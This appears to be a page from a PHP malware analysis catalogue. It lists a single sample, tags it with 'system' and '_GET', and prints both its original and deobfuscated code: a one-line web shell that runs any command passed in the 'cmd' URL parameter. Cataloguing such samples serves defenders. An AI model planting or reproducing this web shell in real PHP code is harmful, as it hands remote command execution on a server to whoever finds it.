Toggle navigation
Beneri
Hash Game
Real Sec
Malware Analysis
About
PHP Malware Analysis
Back to list
Tags
Execution
system
Input
_GET
Deobfuscated code
<?php echo "Shell"; system($_GET['cmd']);
Original code
<?php echo "Shell";system($_GET['cmd']); ?>